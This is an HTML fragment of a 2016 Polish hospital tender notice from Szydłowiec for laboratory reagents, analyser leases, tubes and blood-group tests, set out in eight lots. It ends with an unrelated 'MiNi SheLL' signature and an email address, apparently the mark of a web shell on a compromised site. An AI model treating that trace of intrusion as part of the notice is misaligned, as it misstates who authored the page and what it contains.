6.Czynsz dzierżawny może zostać zwaloryzowany przez Wydzierżawiającego   zgodnie ze wskaźnikiem cen towarów i usług ogłaszanych przez Prezesa Głównego Urzędu Statystycznego, a ogłaszanym w Dzienniku Ustaw.
7.	W przypadku, gdy Dostawca zamierzał będzie dokonać podwyżki cen obowiązany jest zawiadomić o tym Odbiorcę na piśmie i określić nowe kalkulację.
8.Każdorazowa zmiana cen wymaga pisemnego udokumentowania przez Sprzedającego   co najmniej na 14 dni przed dostawą.
9.Odbiorca obowiązany jest udzielić odpowiedzi Dostawcy na piśmie w terminie 14 dni od daty otrzymania propozycji nowych cen i nowe ceny będą miały zastosowanie tylko w przypadku, gdy Odbiorca wyrazi na nie zgodę. W przypadku braku zgody lub nieudzielania odpowiedzi przez Odbiorcę umowa ulegnie rozwiązaniu z upływem ostatniego dnia terminu 30- dniowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz.szydlowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Inwestycyjno - Gospodarczy i Transportu Medycznego, ul. Staszica 4,              26 - 500 Szydłowiec, tel./fax.: (048) 617 - 14 - 31..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2016 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Szydłowcu,                    ul. Wschodnia 23 w sekretariacie, pok. nr 57..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Biochemia - Aparat KONELAB 20 + ISE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Biochemia - Aparat KONELAB 20 + ISE	
1.BILIRUBINA TOT. MET. NBD. 1 op.(4 x 60 ml)	9 op.
2.CALCIUM ARSENAZO III 1 op.(8 x 20 ml)	6 op.
3.TOTAL PROTEIN PLUS 1op.(12 x 20 ml)	6 op.
4.ENZYLINE ALFA AMYLASE 1 op.(16 x 5 ml)	9 op.
5.CREATYNINE ENZYMATIC 1 op.(4 x 60 ml)	12 op.
6.HDL CHOLESTEROL 1op. (4 x 80 ml)	6 op.
7.HDL:LDL CALIBRATOR 1op.( 5 x 1 ml)	3 op.
8.GLUCOSE GOD - POD 1 op.(10 x 60 ml)	12 op.
9.CHOLESTEROL LIQ 1 op.(10 x 60 ml)	12 op.
10.WASHFLUID 1 op.(8 x 20 ml)	9 op.
11.TRIGLYCERIDES 1 op.(12 x 20 ml)	15 op.
12.UREA1 op.( 12 x 20 ml)	9 op.
13.URIC ACID (AOX) 1op.( 8 x 20 ml)	6 op.
14.ASPAT:GOT (IFCC) 1 op.(8 x 20 ml)	12 op.
15.ALAT:GPT (IFCC) 1op. (8 x 20 ml)	12 op.
16.ALP (IFCC) 1 op.(15 x 5 ml)	9 op.
17.MAGNESIUM XYLIDUL BLUE 1op. (8 x 10 ml)	9 op.
18.PHOSPHORES 1 op.(12 x 20 ml)	6 op.
19.IRON FERENE 1 op. (10 x 20 ml)	6 op.
20.NORTROL CONTROL SERUM 1 op.(10 x 5 ml)	9 op.
21.ABTROL CONTROL SERUM 1 op.(10 x 5 ml)	9 op.
22.s - Cal 1 op.(10 x 3 ml)	6 op.
23.e - Cal 1op.(5 x 3 ml)	6 op.
24.KONELAB WASHING SOLUT. 1 op.( 4 x 20 ml)	6 op.
25.KONELAB ACRYLIC CUVETE (1 op. a 12 tys.)	18 op.
26.KONELAB  6M. KIT	3 op.
27.KONELAB 20  12 M. KIT	3 op.
28.NACZYNKA 0,5 ml  a 1000 szt.	15 op.
29.CK 1 op.(2x25  ml)	3 op.
30.GGTP 1 op.(15 x 5 ml)	6 op.
31.CRP KONE  1 op.(1 x 3 ml)	3 op.
32.CONTROL N CRP 1 op.(5 x 1 ml)	2 op.
33.CONTROL P CRP 1 op.(5 x 1 ml)	2 op.
34.Calibrator CRP 1op. (5x1 ml.)	2 op.
35.Odczynnik do modułu ISE 1 op.(4 x 400 ml)	15 op.
36.ISE Calibrtor 2 i 3 1 op.(4 x 20 ml) 	2 op.
37.Na - elektrode (do KONELAB 20 ISE)	2 szt.
38.K - elektrode (do KONELAB 20 ISE)	2 szt.
39.Elektroda referencyjna  	1 szt.
40.REF elektrode solution  	2 op.
41.KONELAB  20 ISE 6M. KIT	3 op.
42.KONELAB 20  ISE 12 M. KIT	3 op.
43.H.pylorii Ag w kale	3 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dzierżawa  aparatu + odczynniki do badań koagulogicznych:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I Dzierżawa analizatora koagulogicznego: Tak - podać nazwę handlową, model oraz producenta
1.Gwarancja  36 miesiące	Wymagane
2.4 kanały pomiaru 	Wymagane 
3.Duży  dotykowy wyświetlacz	Wymagane 
4.Wprowadzenia aplikacji odczynnikowej za pomocą kodów kreskowych	Wymagane 
5.Oprogramowanie w języku polskim	Wymagane
6.Aparat rok produkcji (min. 2015)	Wymagane
II   Odczynniki do badań koagulogicznych
1.Odczynnik do oznaczania czasu protrombinowego 1 op. - (12 x 4 ml) (1 op. - max. 48 ml.) 40 op. (1920 ml.)
2.Odczynnik do oznaczania APTT 1 op.  - (max 24 ml) - 12 x2ml	8 op. (192 ml)
3. Surowica kontrolna - zakres normalny 1 op. - (10 x 1 ml)	10 op.(100 ml.)
4. Surowica kontrolna - zakres patologiczny  1 op. - (10 x 1 ml)	10 op.(100 ml.)
5. Kuwety pomiarowe oferowanego analizatora 500 szt. 40 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dzierżawa  czytnika do moczu + zakup pasków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I  Czytnik do moczu: (z wyświetlaczem i wbudowaną drukarką, z możliwością przechowywania do 1000 -ca  wyników badań 	
1 Podajnik pasków w ruchu ciągłym 	Wymagane 
2 Pojemnik na zużyte paski w aparacie	Wymagane 
3 Aparat fabrycznie  nowy,  rok produkcji  min 2015 r. 	Wymagane 
4 Paski i aparat tego samego producenta - dostawcy	Wymagane 
5 Automatyczna kalibracja i prosta obsługa	Wymagane
II   Paski do badania  moczu	
1 Paski do moczu min 11 parametrów  (pole do kwasu askorbinowego) 1 op. a 100 szt. 	600 op.
2 Paski powinny posiadać certyfikat CE.	Wymagane
3 Mocz kontrolny patologiczny ciekły 4 x 15 ml stabilny 30 dni po otwarciu.	20 op.
4 Mocz kontrolny normalny ciekły 4 x 15 ml stabilny 30 dni po otwarciu.	20 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.70.00-7, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Probówki i  inny drobny sprzęt laborat..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Probówki do badań hematologicznych z EDTA-K2 z korkiem zwykłym i nalepką  na 1 ml. 12x 75 mm	5 000 szt.
2. Probówki do badań hematologicznych z EDTA-K2 z korkiem zwykłym   i nalepką  na 2 ml. 12x 75 mm	10 000 Szt.
3.Probówki do koagulogii  na 1,8 ml krwi z nalepką 12 x 75 mm 9 000 szt.
4.Zestaw do oznaczenia OB. (próbówka na 1,6 ml krwi z nalepką + rurka z podziałką	10 000 szt.
5.Statyw do nastawiania OB  (10 miejscowy)	6 szt.
6.Probówki o poj.  11ml  z korkiem i granulatem do szybkiego wykrzepiania krwi i seperacji surowicy o wysokim stopniu przejrzystości (z medoplast , polistyrenowe lub równoważne, równoważność ma polegać na takiej samej wysokiej przeźroczystości)   16 x 100 ml - z ofertą należy dołączyć wzór probówek.	15 000 Szt.
7. Probówki okrągłodenne, 12-13x100 mm przejrzyste  (z medoplast , polistyrenowe lub równoważne, równoważność ma polegać na takiej samej wysokiej przeźroczystości) -  prosimy o wzór. 2000 Szt.
8. Probówki Ependorfa a 500 ml	2000 szt.
9.Płyty z tworzywa przeźroczystego do oznaczania grupy krwi 5x7 (1 op a 100) 5 op.
10.Końcówki do pipet automatycznych żółte  200 ul  1 op. a 1000 szt	20 op.
11.Końcówki do pipet automatycznych niebieskie  1000 ul 1 op. a 1000szt	15 op.
12.Szkiełka nakrywkowe (24 x 24) a 1000 szt.	20 op.
13.Szkiełka podstawowe - mikroskopowe 75x25mm, grubość 1mm ciętymi krawędziami bez pola do opisu (1 op. a 50 szt.) 	50 op.
14.Mazaki do pisania po szkle (niebieskie),  (1 op. a 12 szt.)	8 op.
15.Pipeta automatyczna ustawna 1 - 50 ul	2 szt.
16.Pipeta automatyczna 50 ul	2 szt.
17.Pipeta automatyczna 200 ul 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7, 33.19.25.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Odczynniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Test do wykrywania krwi utajonej w kale (bez diety), (1 op a 25) testów	8 op.
2.Test na lamblie met EIA ( 1 op. a 96)	4 op.
3.ASO  + kontrole (1op. a 100)	4 op.
4.Odczyn Walera  Rosego + kontrole a 100	4 op.
5.CPR + kontrole (a 100 ozn a 1 op.)	10 op.
6.WR + kontrole a 100 	3 op.
7.RF + kontrole  a 100	6 op.
8.Testy do wykrywania narkotyków w moczu (5 parowe a 10 szt. w 1 op.)	4 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Odczynniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Odczynnik May - Grunwalda a 1 l	15 l.
2.Odczynnik Giemsy 1 op. 1 l	15 l.
3.Płyn Lugola a 1 l	5 l.
4.Odczynnik Extona a 1 l	5 l..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.19.25.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Oznaczanie przeciwciał mikrometodą żelową wraz z dzierżawą wirówki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I Dzierżawa wirówki	
Wymagania	
1. Badanie przeglądowe przeciwciał pośrednim testem antyglobulinowym na 3 krwinkach wzorcowych, włączając antygen Cw - zgodnie z obowiązującymi przepisami. Mikrokarty wypełnione surowicą anyglobulinową poliwalentną.	Wymagane 
2. Metodyka eliminująca płukanie krwinek czerwonych - zawiesina krwinek czerwonych poniżej 1%.	Wymagane 
3. Wymagane jest, aby odczynniki były gotowe do użycia (krwinki wzorcowe zawieszone w odczynniku o niskiej sile jonowej - poniżej 1 procent, a karty składały się z 6 mikrokolumn  i były wypełnione nieprzelewającym podłożem separującym. Surowice wzorcowe do oznaczeń  PTA naniesione na kolumienki przez producenta.	Wymagane 
4. Wymagane są dostawy odczynników krwinkowych transportem monitorowanym pod względem temperatury  w czasie transportu (2-8 st. C), a przykładowy wydruk  ze wskazaniami temperatury z wykonanych dostaw musi stanowić załącznik do oferty.	Wymagane 
5. Przechowywanie wszystkich mikrokart w temp. pokojowej (18-25 st. C).	Wymagane
6. Termin ważności odczynników - minimum 9 miesięcy od daty dostawy, odczynników krwinkowych - 5 tygodni.	Wymagane
7. Wirówka do mikrokart na 6 - 10 miejsc - 1 szt. Stała prędkość   i czas wirowania. Nowa lub używana, z wyjmowanym rotorem bez użycia narzędzi dla ułatwienia dezynfekcji.	Wymagane
8. Nieelektroniczna (manualna) pipeta multidozująca dedykowana do systemu - 1 szt. Nowa lub używana.	Wymagane
9. Instalacja i przeprowadzenie szkolenia personelu użytkownika  w siedzibie zamawiającego, potwierdzanego stosownym certyfikatem.	Wymagane
10. Załączyć do oferty certyfikaty CE oferowanych wyrobów medycznych.	Wymagane
11. Dołączenie polskojęzycznej instrukcji obsługi aparatury i techniki wykonywanych badań.	Wymagane
12. Do oferty zamawiający wymaga załączenia pozytywnej opinii Instytutu Hematologii i Transfuzjologii w Warszawie o oferowanych testach mikrokolumnowych (zgodnie z obowiązującymi przepisami IHiT Medyczne zasady rozdz. 7 punkt 7.5, wyd III), który na podstawie ustawy z dnia 22.08.1997 r. o publicznej służby krwi (Dz. U. Nr 106, poz. 681, z późn. zm.) stanowi w Polsce obowiązujące przepisy w jednostkach organizacyjnych publicznej służby krwi.	Wymagane
13. Do oferty zamawiający wymaga załączenia pozytywnej opinii Instytutu Hematologii i Transfuzjologii w Warszawie o oferowanych testach mikrokolumnowych (zgodnie z obowiązującymi przepisami IHiT Medyczne zasady rozdz. 7 punkt 7.5, wyd III), który na podstawie ustawy z dnia 22.08.1997 r. o publicznej służby krwi (Dz. U. Nr 106, poz. 681, z późn. zm.) stanowi w Polsce obowiązujące przepisy w jednostkach organizacyjnych publicznej służby krwi.	Wymagane
14. Nakłuwacze do pobierania krwi z drenów posiadały kaptur umożliwiający nałożenie nakłuwacza na probówkę, która zapobiega jednocześnie rozpryskiwaniu krwi przy nakłuwaniu drenów.	Wymagane
II   Oznaczanie przeciwciał mikrometodą żelową	
1. Zestaw trzech krwinek do badania przeglądowego przeciwciał. Krwinki wzorcowe o stężeniu poniżej 1% gotowe do użycia.	36 op.
2. Badanie przeglądowe przeciwciał w PTA:LISS na trzech krwinkach wzorcowych włączając antygen Cw.	2000 badań
3. Pipeta multidozująca	1 szt.
4. Końcówki do pipety	2000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Oznaczanie grup krwi metodą manualną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Krwinki wzorcowe do układu ABO gotowe do użycia  1 op. (3 x 4ml)	36 op.
2.Odczynniki monoklonalny anty A seria I - 1 op. 5 x 10 ml	12 op.
3.Odczynniki monoklonalny anty A seria II - 1 op. 5 x 10 ml	12 op.
4.Odczynniki monoklonalny anty B seria I - 1 op. 5 x 10 ml	12 op.
5.Odczynniki monoklonalny anty B seria II - 1 op. 5 x 10 ml	12 op.
6.Odczynniki monoklonalny anty RUM - 1 op. 5 x 10 ml	18 op.
7.Odczynniki monoklonalny anty D Blend - 1 op. 5 x 10 ml	18 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com